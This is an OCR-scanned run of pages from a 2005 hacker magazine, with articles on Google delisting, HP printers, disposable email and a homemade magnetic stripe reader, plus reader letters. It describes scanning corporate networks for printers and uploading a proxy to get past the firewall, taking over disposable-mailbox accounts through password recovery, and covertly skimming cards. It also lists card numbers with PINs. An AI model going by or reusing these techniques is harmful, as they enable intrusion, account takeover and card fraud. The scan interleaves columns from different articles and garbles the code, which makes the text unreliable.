of Google and start t o bask i n relative anonymity. what context your terms are being used in.
Because once you're out, then your page is off <META NAME= "GOOGLEBOT" C O N T E N T = " N O S N I P
the Internet for a l l intents and purposes. Having b P E T " >
your page delisted i n Google is almost Like having If you want your page t o b e listed i n Google
1 your page password protected where the pass- but don't want them t o store a n archive of your
word i s your URL! (In this article, I alternate be- page, then add only this next t a g t o your header:
tween keeping Google's bots out of your page and CMETA NAME="ROBOTS" CONTENT="NOARCHIVE"~
keeping a l l search engine bots (there are other This i s handy if you have a page t h a t changes
search engines now?) out. I'm assuming that if frequently, i s time critical, or ifyou don't want
you want out of Google you want out o f them all. searchers t o be able t o see y o u r old pages. For
I f you really only want out of Google then use example, if you're a professor posting test solu-
"Googlebot" instead o f "Robots" i n the following tions or something similar you'd definitely want
examples.) t o remove Google's cache if y o u plan on reusing
The first thing you want t o do is add some the test.
meta tags t o your index.html. I f you want Google After you add a l l the meta t a g s you want, you
- and every other engine - t o ignore your entire may be finished. But if you're t r y i n g t o keep bots
site during i t s spidering of the web, add this out of your entire site permanently, the next
meta tag t o your header: thing t o do is create a robots.txt f i l e i n your
S p r i n g 2005 page 23'
/I;ebsite1s root directory. Pull up Notepad and Special thanks t o Google's Listing ~ e m o v a i
type i n the following two lines: Resource which i s at: http://www.google.com.gr/
User-agent: * &remove. html
Disallow: / The above page can also help you if you want
Save this file as robots.txt and f t p it t o your t o remove images from Google's image search en-
site's root directory. This will t e l l the Googlebot gine. Especially handy if you don't want people t o
be able t o link your name t o your face or find
and actually a l l other search engines not t o
your wedding photos. You can learn more about
bother looking at your page and t o spider some-
robots.txt files and what they can do here:
where else. Obviously, if you create this file then http://www.robotstxt.org/wc/norobots.html
you don't need the meta tags but if you're extra Of course, it may simply be easier t o password
paranoid then you should use both methods Like I protect your page if you don't want people seeing
did. what's inside. But sometimes that's not feasible
After you've done a l l that, go and sign up for because of the inconvenience it may pose t o your
a Google account a t http://services.google audience. Besides, Google can index password-
~.com/urlconsole/controller protected pages according t o Google's corporate
This page is for people who urgently want information page. Not only that, but anything
their URLs removed from the index. Even then it that is simply sharing space on your server is fair
will take up t o 24 hours. But if you'd rather wait game t o the Googlebot like Excel or Word files.
six t o eight weeks, be my guest. After you create Even SSL pages can be indexed. The above meth-
an account, Google w i l l email you a link where ods willserve t o hide your page by practically dis-
connecting it from the web. Once Iwas out Itried
you enter the URL of your robots.txt file you just
t o Google for my name and page and sure enough
uploaded and then Google sends their bot over t o
it was gone. It was like the page didn't exist and
your site right away t o read it. With any luck, it gave me such a nice warm fuzzy feeling inside.
you're out of the index i n a day or two. Iwas out One disclaimer though: if you were using
i n less than 12 hours. I f you want t o get back in, Google as your in-house search engine solution
just remove a l l the meta tags and the robots.txt t o help your users find information on your page
file. As Long as someone is linking t o you some- it will no longer work once you've been delisted.
where you'll be listed again after Google's next Have fun!
web crawl. Shoutouts to the Boneware Crew.

H P Printers:
by DarKry HP did build i n password protection, but it is dis-
darkry@gmail.com abled by default and i n fact, i n a l l my exploring I
Iwas recently reading a book of fictitious sce- didn't find a single printer that had a password
narios i n which a hacker gains access t o a net- set. Many of these printers also have an f t p
work through a printer. The book cited a t o o l server enabled by default, and again the pass-
called Hijetter available a t phenoelit.de. Hijetter words are a joke. Different models have different
i s a t o o l for windows which uses HP's PJL protocol default passwords and t o list them here would be
t o connect t o and perform simple tasks on cer- pointless (use google). I n case the implications
tain printers. Curiosity got the best of me so I aren't obvious t o everyone yet let's review. These
started doing a little research into what exactly printers have web and f t p servers running out of
these printers are capable of. First let's look at the box. With a beefy 8mb of flash memory stor-
some of the features built into these printers; age a printer suddenly becomes an attractive
many ship with built-in web servers which allow place t o anonymously store a l l sorts of fun
for remote administration. These servers allow a things. But this i s only the tip of the iceberg.
remote administrator t o see the status of the First let's look at how t o find printers. As an
printer, view recent print jobs, and change envi- administrator is setting up a network he is wor-
ronment variables. It i s worth mentioning that ried about a l o t of things. Keeping the bad guys

'out i s top priority. After configuring a firewall t o
only allow the right people access t o the right
ports the rules can start t o look like a giant game
of Blinko. It i s understandable that blocking the
printer spooling port from outside access may
not have crossed the admin's mind. I n f a d there
are valid reasons t o allow this, for instance, t o
allow employees t o print from home. All ports
aside, a printer definitely doesn't appear t o be a
threat. After all, what damage can a printer do?
Fire up nmap and run a scan on your corporate
network for machines with port 9100 open. Once
you have a list, t r y surfing t o each address.
Chances are most of them will have a web server.
Those who are interested i n getting their hands
dirty can get a library for PJL communication,
also from the folks at Phenoelit.
Now so far this has been a relatively benign
hack. We have accessed a printer and the most
damage we can do i s lock it with an error or print
"Insert Coin" on the LCD display. Iwas starting t o
get bored with a l l this and about t o move on t o
bigger and better things when Inoticed some-
thing strange about some of the newer printers
by StankDawg
stankdawg@stankdawg.com
The spam epidemic has gotten horribly out of
control. We a l l know that. Many solutions are be-
i n g attempted t o avoid spam from legislation t o
technical alternatives. Filtering is not an exact
science and it never w i l l be. Blacklisting sites and
servers is unrealistic because one server can be
tainted by one user. Another recent phenomenon
has been the onset of "disposable" email ac-
counts. Some sites that offer these services are
dodgeit.mm and mailinator.com but there are
several others scattered around the web.
A disposable email account i s one that i s not
consistently used or tied t o an individual person.
Personally, Ihave created accounts on my own
server for this very purpose and then deleted the
account after Iwas done with it. Not everyone
has the luxury of having their own server t o do
this. To meet that need, some sites have ap-
peared that allow any user t o create a disposable
, account t o get a reply or information without fear
\
that Iwas finding. Ikept seeing references t o
something called Chai Java. This got me inter-
ested again. Could it be t h a t some o f these print-
ers actually had a java virtual machine built i n t o
them? That would mean t h a t a n y code Iwrote
could be run from a printer, b u t more importantly
a printer inside a target network. After playing
around a b i t more Ifound that, yes, this really
was possible. From the web server on these print-
ers you can upload code t o be r u n on t h e printer.
Chai Java is still i n i t s infancy b u t already it i s
possible t o run a l l sorts o f interesting things.
Most importantly, an important step has been re-
moved. The most difficult step i n breaking i n t o a
network has always been f i n d i n g a way past the
firewalls. Suddenly instead of searching for a vul-
nerable machine, an intruder can simply connect
t o a printer's web site and upload a proxy. As far
as security goes it's as bad as having internal net-
work jacks on the outside wall o f your corporate
headquarters.
Shouts of course go out t o DarkLordZim,
Brutallnquisition, Razorwire, a n d the rest o f the
crew on mediamonks.
of the influx o f spam t h a t may result from re-
questing information from some site.
You could use this t o sign u p t o a mailing list
for example. You can then check i n on that ac-
count t o read the mailing l i s t without fear of
them selling your address around t o other lists or
spammers. You might also use t h i s as a one-time
disposable message center. Perhaps you want t o
post t o a site and want replies t o a question but
not get flooded with responses o r have your real
email address made public. These are perfect ex-
amples on how and why t o use this type of ac-
count. Specifically, the mailing l i s t example i s a
good way t o add RSS content t o your site without
the spam. Many of these sites (dodgeit.com for
example) generate a news feed using RSS t h a t
you can add t o your site. Mailing list content t h a t
you control!
Keep i n mind t h a t due t o t h e nature o f these
systems, they provide free access for anyone t o
use them a t any time. This means t h a t these dis-
posable email sites do not have account valida-
6 o n of their own. That could be an ironic mess!
What they do is allow anyone t o access any ac-
count at any time. That way, there are no pass-
words t o deal with and no account set up of any
kind. Anybody can use the service and nobody i s
excluded. It's a spam solution for everyone!
This leads me t o the first problem with these
systems as they are now. Once again, due t o the
nature of these systems, they are meant t o be
disposable and used as described above. Dispos-
able accounts were not intended t o be used for
any type of real mail usage although, theoreti-
cally, they could be. That is why Icall them "dis-
posable." I n fact, you will find that there i s no
delete function on these services. What need
would there be for a delete function on a dispos-
able account anyway? The system will delete files
every 30 days or whatever the system i s set for.
Another reason t o not have a delete function i s
the fact that Imentioned earlier about anyone
accessing any otheraccount. All it would take is a
few ne'er-do-wells t o go i n and delete your con-
firmation messages before you can get t o them.
Someone could even delete everything i n your
mailbox just t o be a jerk. I f you think that would
be too hard t o maintain and figure out, trust me
when It e l l you that it could easily be scripted t o
do this with no manual intervention. This i s not
even the biggest problem with these systems. It
is the misuse of them that could really get you
Owned.
The big mistake that people make with this
kind of account is that they t r y t o use it for
things that quite simply, they should not. Some
people may think that registering for a forums
site or a CMS (content management system) with
a disposable account may be a good idea t o avoid
potential spam or revealing their real email ad-
dress i n a questionable environment. But under-
standing how a forum works is crucial. I f the
forum doesn't validate any emails, then it w i l l be
fine. Most forums, however, will make you vali-
date the email address by sending a confirmation
password t o that address that you must enter t o
complete the registration process. There you go
sharing your account information, including
password, with the world.
Since that disposable email account is open
t o the world, anyone can check your mail. All
they need t o know i s the account name. I f they
registered with a forum site for example, it can
easily be looked up i n the members list. Go back
and check their "disposable" email account and
see if they left the email there. Remember, there
i s no delete feature on these systems! I f it is still
i n the system, you will see the site and the pass-
word. People who are using a disposable email
, account t o register for a site are usually too lazy
t o change their password. Ican t e l l you as a mat:
ter of fact that this happens quite frequently.
Ako, keep i n mind that these services are
web-based. "So what?" you may say. Well, i n the
example above Imentioned that if you noticed
someone at a site or went digging through a site
for those email addresses you would find them.
No one really wants t o manually search for peo-
ple. So we look t o automate things. Since these
are web services, guess what crawls out every so
often and picks them up? That's right, spiders
from search engines! I f you haven't already
dropped this article t o t r y it, stop and do a
Google search for "@dodgeit.com" and see what
you can find. I f the site is designed properly,
they will prevent spiders from finding the actual
mailboxes on the disposable email site (which
they do) but other sites where people are posting
or using the disposable email addresses usually
do not.
Ialso want t o emphasize that just because
the initial emails with passwords may have been
rolled from the system, that doesn't mean any-
thing. There is a fatal backdoor that exists here.
It is actually the true definition of a backdoor!
Even if you miss the original confirmation email,
or even if they changed their password right away
as suggested, almost every site offers a password
recovery system for their users. All a person
would have t o do is go t o t h a t password recovery
request and have a new password sent t o the
original email address, which i s...you guessed it,
public!Any account that has been registered with
any of these "disposable email accounts" can be
backdoored. And if you think this isn't a danger,
imagine the identity t h e f t that could take place!
Opening eBay accounts under your account,
changing other information on a site, the list
goes on.
This is not only an open invitation for a per-
son t o have their account owned and be spoofed
by someone eke. It could actually be worse than
that. Those of us who run websites may now have
people using the system who have taken over
someone else's account. They are now i n the
system, with no valid email, so that they can
wreak havoc on your system if they wanted t o
without fear of repercussion. Obviously, you
could check the logs but they simply use a proxy
t o avoid detection without much deeper means of
investigation.
What can and should be done about these
problems? Well, that i s for you t o decide. As a
user of these services, Ican simply recommend
that you be careful and think out the dangers of
using them. Do not put any personal information
on them or have personal information sent t o
them. Do not use them t o register with sites
2600 Magazine 1

G e r e your password w i l l be mailed t o you. I f you
do, for crying out loud go check the email right
away and then go i n and change your password
immediately! Doing t h a t will keep you from being
spoofed on a site but it still lets the world now
that you are registered a t that site, so you have
lost some privacy i n general. Keep that i n mind
when you register for your assorted prOn sites.
What if you are a webmaster o f a site and you
are concerned about this? You also have t o make
your own choices. You may decide t o not allow
users t o register from these known sites. Many
sites do not allow yahoo or hotmail or other pub-
lic mail account users t o register. These sites can
be treated the same way. You can send your pass-
words encrypted somehow but this makes it
tougher for non-tech sawy users t o complete
registration. It would, however, be safer for your
site. Certainly you should force your users t o
change their password immediately when they
register so they do not leave t h a t default pass-
word working.
Finally, Ido not see with so many public email
services available, why people don't just create a
new Gmail account or yahoo account or hotmail
account. The list of options is endless. These ac-
counts would be password protected but you
could still treat them as disposable accounts. Use
them once, then forget about them. Register
them against the disposable services Listed above
for two layers of protection! That little extra step
will pay off. But instead of using Gmail or yahoo,
we decided it would be better t o just create our
own service.
When Ifirst wrote this article, Ioriginally
suggested that the reader could set up a new
mail service that could eliminate the problems
mentioned earlier. It so happens t h a t Ihad a do-
main registered just as a test bed for different
projects that we work on. Ithought it would be a
good idea t o turn this site i n t o a disposable email
service that actually protected your privacy and
anonymity while providing spam protection. The
fact t h a t it creates a funny email address i s a
1 bonus. It was a simole matter of desianina a
Four new pages have been added as of this issue!
They are Pages,61, 62;\63, and 64.
Please do your'best tcv make them feel a t
1 >
\Spring ZOO5
\
database that interacted with t h e mail server t o
automatically create temporary accounts on t h e
mail server and delete them after a certain
amount o f time.
What makes this service different? Firstly, it
offers password protection! Secondly, it offers
the ability t o delete emails. Both o f these are of-
fered through a web mail front-end t h a t no one
else can access without a password. What this
also does i s lock t h e backdoor. Sending password
change requests will not work f o r t w o reasons.
One, they will not have t h e password t o your ac-
count (unless you do something stupid), and
two, the accounts a l l have expiration dates! The
whole point o f a disposable email account i s t h a t
it be temporary. We designed our database t o
have a user-defined expiration d a t e (seven days
maximum) for the account time-to-live. After t h e
expiration date i s passed, t h e account i s deleted
by a cron job and permanently locked i n the
database t o prevent it from ever being used
again. This includes the original user. If you
wanted a reusable account, t h e n you shouldn't
have used a disposable email service.
We designed the database to be very simple,
yet powerful at the same time. I t only keeps the
minimum amount of data t o automate the ser-
vice, and the password i s not o n e o f them. That i s
handled by the mail server alone t o avoid another
point of attack. We are using a web mail client
(still undecided a t this point, b u t probably squir-
relmail) t o handle the interface, so t h a t code
base was already done; we simply implemented
it. Nick84 wrote the base code a n d we a l l worked
together modifying it from there. The site i s
tested and up and running, so please feel free t o
use it. It i s a free service from t h e DDP t o help
protect your privacy and avoid spam. We use it.
We like it. We hope you do too.
Further research: dodgeit.com, mailinator
,.corn, Google "related:", wil1hackforfood.biz.
Shoutz: The DDP, particularly nick84 for writ-
i n g the base code, ld@blo, Decoder, lucky225,
sauirrelmail. ora.
Page 27
 by Red bird
redbird@2600.com
Good magnetic stripe readers are hard t o
come by. Most are expensive, only capable of
reading one or two tracks, and have inconvenient
interfaces. I n this article I w i l l describe the
process of making an extremely cheap, simple,
and reliable single-track reader from parts that
are readily available. We w i l l be interfacing the
reader t o the microphone input of a sound card,
which is very convenient for use with most lap-
tops and desktops.
Iwill not be discussing the theory and con-
cepts of magnetic stripe technology and the as-
sumption is made that you are somewhat familiar
with the topic. For a simplistic overview of mag-
netic stripe technology that is easy t o read and
understand, Irecommend that you read the clas-
sic article "Card-0-Rama: Magnetic Stripe Tech-
nology and Beyond" by Count Zero, which can be
found quickly by doing a web search for keywords
i n the title.
Materials
Below is a list of materials you'll need t o con-
struct the reader.
Magnetic head. Magnetic heads are extremely
common. Discarded cassette tape players contain
magnetic heads of almost the exact size needed
(the small difference won't matter for our appli-
cation). Simply obtain a discarded cassette tape
player and remove the magnetic head without
damaging it. These heads are usually secured
with one or two screws which can be useful when
building the reader, so don't discard them.
3.5mm mono phone plug (with 2-conductor
wire). You can find this on a discarded monaural
earphone or i n an electronics store.
Soldering iron with solder.
Optional:
Wood (or other sturdy material) base t o mount
magnetic head.
Ruler or other straight edge t o slide cards on.
Construction
The actual hardware design i s incredibly sim-
ple. The interface consists of simply connecting
the output of the magnetic head directly t o the
mic input of a sound card. Solder the wire con-
necting the 3.5mm mono phone plug (base and
tip) t o the leads of the magnetic stripe head. Po-
larity does not matter.
I recommend that you mount the head i n a
way that makes it easy t o swipe a card over it with
a constarit velocity. This is where your custom
hardware ingenuity comes in. Mount a ruler (or
other straight edge) perpendicular t o the mag-
netic head, with the reading solenoid (usually
visible as a black rectangle on the head) at the
correct distance from the base for the corre-
sponding track. Track 1starts a t 0.223" from the
bottom of the card, Track 2 starts at 0.333", and
Track 3 starts a t 0.443".
Alternatively, you can purchase a surplus
reader with no interface (i.e., scrapped or with a
cheap l l L interface) and follow the same instruc-
tions with the exception t h a t the magnetic head
will already be mounted. Most surplus readers
come preset t o Track 2, although it is usually a
simple hardware mod t o move it t o the track
you'd like t o read. This will save you the trouble
of building a custom swiping mechanism and will
also improve the reliability o f the reads. There are
surplus readers t h a t can be purchased for less
than $10 US at various online merchants.
Software
I n this project, the software does a l l the
h e a y lifting. The "dab" utilityincluded i n this ar-
ticle takes the raw DSP data from your sound
card, decodes the FSK (frequency shift keying -
a.k.a. Atkin Biphase) modulation from the mag-
netic stripe, and outputs the binary data. Addi-
tionally, you can decode the binary data using
the "dmsb" utility (available i n the "code" section
of the 2600 website) t o output the ASCII charac-
ters and perform an LRC check t o verify the in-
tegrity of the data, provided that the stripe
conforms t o the specifications described i n IS0
7811, 7813, and optionally IS0 4909 (for the un-
common Track 3). Becoming familiar with these
specifications will help you understand the con-
tents of the magnetic stripe when viewing the
decoded data.
The provided software is more proof-of-con-
cept than production code, and should be treated
as such. That said, it does i t s job well. It is open
source and released under the MIT license. Feel
free t o contribute.
Requirements
Linux (or the desire t o port t o another operating
bsystem)
A configured 16-bit sound card
Access t o the/dev/dsp device
libsndfile
Note that "dab" can also take input from any
audio file supported by libsndfile. However, it
G s t be a clean sample that starts at t h e begin-
ning of the file. This is useful t o eliminate the re-
quirement o f a sound card and allow samples t o
be recorded from another device (e.g., an MP3
player/recorder) and decoded a t another time.
Compiling
Edit any configuration #defines near t h e top
of the dab.c file and proceed t o compile t h e
source with the following command^
cc dab.c -0 dab -1snd6le
Usage f o r dab.c
-a, --auto-thres Set auto-thres percent
rage (default: 30).
-d, --device Device to read audio data
,from (default: /dev/dsp).
-f, --file File to read audio data from
,(use instead of -d).
-h, --help Print help information.
-m, --max-level Shows the maximum level
@(use to determine threshold).
-s, --silent No verbose messages.
-t, --threshold Set silence threshold
,(default: automatic detect).
-v, --version Print version information.
I

I I
My current leader, made o f a modified surplus
reader which is only capable o f reading the three
standard tracks.
Examples
Below are some examples o f a few (hopefully)
less common cards so as t o get a n idea o f the sort
of data you're likely t o find.
Park Inn (Berlin-Alexanderplat z ) Door
Key Cards
Room: 2006
Checkout Date: 12/30/2004
Card 1
Track 2 Data:
5101152006010912130124000120000000000
Card 2
Track 2 Data:
5101152006020912130124000120000000000
Room: 2005
Checkout Date: 12/30/2004
Card 1
Track 2 Data:
5101152005010160230124000120000000000
Card 2
My original reader. With this reader Iwould Track 2 Data:
use a ruler as a track guide. This way I could not 5101152005020160230124000120000000000
only read the three standard tracks, but also data SEPTA Monthly Transpass Cards
on non-standard cards, some o f which have Month: NovemBer 2004
tracks i n odd positions such as through the Serial: 001467
middle of the card. Track 2 Data:

\ S p r i n g ZODii Page i'q 1

610100110104113004000001467
M o n t h : J u n e 2003
S e r i a l : 002421
T r a c k 2 Data:
010100060103063003000002421
M o n t h : J a n u a r y 2002
S e r i a l : 028813
T r a c k 2 Data:
010100010102013102000028813
Sony Connect Cash Cards
C a r d Number: 603571 010462 1134569
P I N : 9014
T r a c k 1 Data:
B6035710104621134569A~49120000040
Track 2 Data:
6035710104621134569=49120000040
C a r d Number: 603571 010462 1132282
P I N : 5969
T r a c k 1 Data:
B6035710104621132282~~49120008147
T r a c k 2 Data:
6035710104621132282=49120008147
S t a r b u c k s Cards
C a r d Number: 6015 0613 2715 8426
T r a c k 1 Data:
B6010565061327158A0040/MOMSDAY04~2501
~0004000060018426
T r a c k 2 Data:
6010565061327158=25010004000060018426
C a r d Number: 6014 5421 5637 9529
T r a c k 1 D a t a : B6010564542156377^0027/
~EXCLUSIVEB2B04A25010004000060019529
T r a c k 2 Data:
6010564542156377=25010004000060019529
C a r d N u m b e r : 6014 5421 6302 5757
T r a c k 1 D a t a : B6010564542156377^0027/
bEXCLUSIVEBZBO4~25010004000060019529
T r a c k 2 Data:
601 05645421 63027=25010004000060015757
Conclusion
This project was originally started for the New
York City MetroCard decoding project that you
may have heard about on O f f The Hook. Nearly a l l
commercial readers are unable t o dump the raw
data as it exists on the MetroCard and, even if
they could, they are priced way above our (and
most hobbyists') budget limitations. This solu-
tion has worked very well for us and can aid you
i n reverse-engineering cards that you may have
as well. The "dmsb" application available online
can be used for simply decoding standard cards
that you have laying around as well.
While my construction example demonstrates
a fairly straightforward and typical use of a
magnetic stripe reader, many other uses can be
considered.
For instance, since a l l the data obtained from
the reader itself is audio, the device can be inter-
faced t o a digital audio recording device, such as
i
\
one o f the many MP3 (and other codec)
player/recorders on the market. You could then
set the device t o record, interfaced the same way
with the magnetic stripe reader, and have a
stand-alone reader small enough t o fit i n your
pocket. Later, you'd view and edit the captured
audio file, saving the clean waveform t o a stan-
dard .wav file t o be analyzed with "dab" (which,
i n fact, has this capability). You can even
construct the reader i n an inconspicuous way,
so onlookers would never realize the device's
capability.
How is this significant? Reading boarding
passes with magnetic stripes is a perfect applica-
tion. These are generally only available i n the
waiting area of airports. They're issued at check-
i n and collected when you board, leaving a very
small time margin during which the stripe can be
scanned. I n my case, I had been flagged for addi-
tional security and the infamous "SSSS" was
printed on my pass. Using my reader, I was able
t o duck into a bathroom and quickly read the
data i n t o my mp3 player/recorder for Later analy-
sis. (I discovered a mysterious code on track 2
(normally blank) which read: "C 13190-2******"
as well as an "5" a t the end o f the passenger data
on track 1.)
But there are other more sinister applica-
tions. What if one o f the waiters at your favorite
restaurant built this device and swiped the card
of everyone who pays with credit? From the data
obtained, an exact clone of the credit card could
be created. Credit card fraud would quickly be-
come out of control if this were commonplace.
The same principle could be applied t o re-
verse-engineering an unknown magnetic stripe
technology. While individual card samples are of-
ten much more difficult t o obtain, scanning sam-
ples as you obtain them enables you t o gather
samples at an astonishing rate. This way, sup-
porters can loan you cards t o scan on the spot. I
have personally used this method for the Metro-
Card decoding project and it works extremely
well.
Icould go on and on with more examples of
the implications of this sort of design, but I ' d like
t o hear back from the readers as t o what other
ideas may have been thought up. All feedback i s
appreciated and, time permitting, a l l questions
will be answered.
Hopefully this project makes you realize how
certain types of technology are priced way above
what they have t o be t o keep them away from
"us" because of the fear of malicious use. I also
hope it encourages more projects like this t o sur-
face so we can learn about and use technology
without the restrictions imposed upon us by big
corporations.
I;* dab." -Decode Aiken Biphaae
Copyright ( c ) 2004-2005 Joseph Battaglia <redbird@2600.com>
Released under the NIT License.
Compiling:
cc dab.= -0 dab -lendfile
*I

I*.* defaults +.*I

#define DEVICE "Idevldsp' I* default sound card device +I
#define SAMPLE-RATE 192000 I
' default sample rate (hz) *I
#define SILENCE-TERES 5000 I. in~tialsilence threshold . I
I*** end defaults *"I

I
' #define DISABLE-VC '
I I* disable velocity correction if defined *I
#define AUTO-Tunes 30 I* pct of highest value to set silence-thres to *I
#define BUF-SIZE 1024 I* buffer size * I
#define END-LENGTE 200 I* msec of silence to determine end of sample *I
#define FREQ-THE5 60 I
' frequency threshold (pct) ' I
#define MRX-TERM 60 I* sec before termination of print-max-level0 *I
Xdefine VERSION "0.6" I* version * I

short int *sample = NULL;

int sample-size = 0;

I* allocate memory with out of memory checking

[size] allocate size bytes
returns pointer to allocated memory *I
void *xmalloc(aire-t s ~ z e )
I
void 'ptr;

ptr = malloc(aize);
if (ptr == NULL) {
fprintf(stderr, ''Out of memory.\n");
exit(EXIT_FAILURE);
)

return ptr;
1
I* reallocate memory with out of memory checking
[ptrl memory to reallocate
[size] allocate size bytes
returns pointer to reallocated memory *I
v a ~ d.xrealloc(vaid 'ptr, size-t sire)
I
void *nptr;

nptr = realloc(ptr, size);

if [nptr == NULL) (
fprintf(8tderr. Out of memory.\n");
erit(EXIT_FAILURe);
1
return nptr;
)

/ + copy a string with out of memory checking

[string] string to copy
returns newly allocated copy of string *I
char *xstrdup(char *string)

char +ptr;

ptr = malloc(strlen(~tring1 + 11;

strcpy(ptr. string);

return ptr;
>
I* read with error checking
[fdl file descriptor to read from
[bufl buffer
[count1 byte8 to read
returns bytes read *I
ssize-t xreadqint fd, void .buf, size-t count)
I
int retval;

retval = readlfd, buf. count);

if (retval == -1) {
perror("read( I " ) ;
exit(EX1T-FAILURE);
1
return retval;
)

I* prints version
[stream] output stream *I
void print-version(F1LE retream)
1
-
fprintflstream, "dab Decade Aiken Biphase\n");
fprintf(stream, "Version % ~ \ n "VERSION);
,
Continued o n page 41
<Spring 2005 Page 3J1
 Research Results
Dear 2600:
This is t o comment on Lori and t3st-s3t's submitted
observations i n 21:3 about t h e "weird" number that gives
off a list o f digits and tones and then reroutes t o a busy
signal. The numbers were 1-800-506-3553 and 1-800-
789-6324. Imyself had an encounter with one of these
numbers. Iwas scanning for extenders and came across
1-800-877-6533. Iwas able t o have it produce 900 16 7
115030974. Icalled the number on February 21, 2004 a t
1:00 P.M. Icalled it again numerous times within the
course of the hour and it punched off 900 3 7 11
5030974 and then 1, and then 4. So pretty much its out-
line is 900 X(X) 7 11 5030974. I n 21:3 t3st-s3t marked
the outline as 200 (XX) 7113267347. Upon further notice
you can see that the only similarities i n these outlines i s
(XX) 7 11. Potentially the 900 and 200 could be state or
area assignments and the 5030974 and 3267347 could
be trunk pairs? Once I documented these numbers I
signed onto the irc.2600.net sewer and chatted with a
few friends. We believe that it could potentially notify
t h e caller of their trunk pair's number.
Also, i f anyone knows anything about AT&T1s Easy
Reach 800 service I'd like t o know. Icalled up an 800
number and was prompted for a password. Iwas thinking
it was an extender because it only requested a two digit
login. Ieventually located it, but Iwill not disclose it for
the client's sake. Ilearned it's a toll-free service t o reach
someone remotely, but I'm assuming that there are other
capabilities.
The Neuralogist
I n our latest experiments on the "weird" numbers we
were genitg a suffix o f 4086584 with prefixes o f 897,
898, 903, and 914 on the 3553 number. For the 6324
number we g o t a suffix o f 3267347 with prefixes ranging
from 215 to 228. As always, 711 was sandwiched be-
tween the prefix and suffix. A l l o f this was identical to
what we g o t i n the fall.
What AT&T Easy Reach offers is basically a toll-free
number that consumers forward to their homes, offices,
o r cell phones. One o f the features which supposedly
makes it harder for outsiders to call them is the imple-
mentation o f a PIN which, as you mentioned, is a grand
total o f two digits. We wouldn't call it the ultimate way to
keep people out.
Dear 2600:
For t h e last ten months Iwas using a prepaid cell
phone through Verizon Wireless. (Verizon's prepaid ser-
vice sucks!) Anyway, Ifinally got a new cell phone and
plan. But Istill had a l o t o f games and ring tones on the
old phone that Icouldn't add t o my new phone. (Both
are Verizon phones.)
Iused Verizon's Get It Now t o get the games, apps,
and tones. This s e ~ c is e kind of cool but is a waste of
money most of the time. When my prepaid account ran
( o u t o f funds, Icould no longer make or receive any
phone calls on thc oid phone.
But then one night by accident while playing Tetris
on my old phone, Iconnected t o t h e Get It Now network.
Iwas able to download any game, program, ringtone, or
picture free ofcharge!I have n o t added money t o the old
phone i n two months and Ican still connect t o Get It
Now and download anything, and Iam never billed for it.
This must be some glitch on Verizon's prepaid phones.
Also, Ibought a US5 cable that connects my old
phone t o my computer. Even though Ican't make or re-
ceive any normal "voice" calls, Ican still use my old cell
phone as a modem for my computer. Ican use Windows
HyperTerminal t o call other modems or fax machines, or
Ican call some o f those free Internet providers like Net
Zero t o connect t o the net from my Laptop when I'm not
a t home or when my cable modem goes out. I'm not sure
why Verizon is still allowing me t o make data calls from
my old phone without billing me for them. And Idon't
understand why Ican make data calls b u t not voice calls.
Have you heard o f anything like this?
And ifVerizon finally realizes how much stuff Igot
from Get It Now and a l l of the data calls Imade, do you
think they would be allowed t o b i l l me for them? Would I
be responsible for paying for t h e subscription charges
and t h e data calls Imade? Imeans it's their fault, not
mine. Idid not sign or agree t o any contracts or any-
thing. It was a prepaid service.
Dyslexic-Hippie
I f y o u didn't sign anything, then it's likely that Veri-
zon doesn't even know who you are. And even if they did,
they would have to somehow prove that you still had
your phone and were still using a service that you techni-
cally no longer had. And after that, it would still be their
responsibility to terminate prepaid service, n o t yours.
But we really doubt this little bug will last much longer
anyway.
Dear 2600:
Recently, whilst shopping i n an Albertsons store here
i n Texas, I came across one t h a t had a Blue Screen of
Death. Iwent by t o check on it over the next week. From
what Icould tell, it runs on Windows 2000 using a piece
of software by NCR. Options i n the menu included look-
i n g at the amount of cash i n t h e machine and testing it
out. It Let me quit the program as well via the touch
screen. Ididn't get much more of a chance t o work with it
as Ididn't have much time. But Iwould appreciate any-
one who could give more information.
The Grand Master of Confusion
Dear 2600:
I'm really nothing o f a hacker. But Ido occasionally
enjoy tinkering around with computers and electronics t o
see what happens. Igot a great opportunity t o do this a
few months back. Iwas a t a bar with some close friends,
which is why Imay not be too accurate with some of the
details. We were sitting by one o f those newer Golden Tee
games (perhaps the 2004/2005 version, I'm not sure). I
had noticed that midnight had come and gone and be-
6 r e long saw that the game was no longer on the Attract
mode that it had been on all night. Instead, it was on a
debug type menu.
For the life of me Ican't figure out why it went into
this mode. It wasn't any special day, not the first or mid-
dle or Last of the month. It didn't seem like it was around
any specific time, maybe 12:30 centraltime.
You could move around using some of the various
buttons, or even up and down with the rollerball. Ifig-
ured out which button was the Enter key and Iwas on my
way. Ihad t o be careful not t o get out of the debug be-
fore Iwas done seeing all that was going on i n there.
From the looks of it, I could have changed the message
displayed on the overhead scrolling LED, but Idoubt any-
one would've noticed. ( I hate when good comedy goes
unnoticed!) There was a surprisingly Large amount of
menus, but for a game that has t o connect t o the Inter-
net somehow Iguess this made sense. Iended the ses-
sion after Iturned the volume up a b i t (it wasn't that
Loud i n the bar but it was basically muted) and found a
way t o turn on free play. Iwas amazed that it worked but
sure enough, once Iexited a l l 1 had t o do was keep push-
ing the add player button t o get the credits high enough
so that my three friends and Icould enjoy a full 18 holes.
Which we didn't - the place closed down before we could.
At a different bar, Ilooked around t o see if there was
perhaps some button or reset switch or any button com-
bination that would take you into the debug menu, but
t o no avail. Iwould have loved t o have spent some more
time looking about i n there, but a t the first bar the game
was pretty much i n plain sight and Ididn't want a sus-
pecting waitress t o kick me out for "breaking" their
game.
CatWithTheGatt
Based on what you told us, it seems as if the bar
closed a t around 1 am. I f somehow they had set this
thing to go into debug mode a half hour after the bar
closed, it would make a degree o f sense. Then, if they
didn't reset the system clock once Daylight Savings Time
ended, debug mode would be entered an hour earlier
while the bar was still open. All o f this is assuming that
this is how the system works and that someone didn't p u t
it into that mode manually.
Further Info
Dear 2600:
This is i n response t o the article "How To Hack The
Lottery" i n 21:3. It should be pointed out that although
the odds of winning the Lottery could be viewed as stag-
gering, i n the mathematical sense, as the author points
out, the remarkable news is that the odds never ever re-
main constant! This is due primarily t o component toler-
ances (high or low). Tolerance, therefore, imparts a
"mechanistic effect" i n a drawing. For example, i f the Lot-
tery uses ping pong balls, the number one ball theoreti-
cally would be lighter than the number 16 ball. The
number 48 ball may be heavier than the 16 ball. Even i f a
computer is used i n a drawing (no ping pong balls), com-
ponent tolerances would possibly still have an effect on
the odds.
There are also intervening factors (non-mathemati-
cal) which have a significant effect on lottery odds:
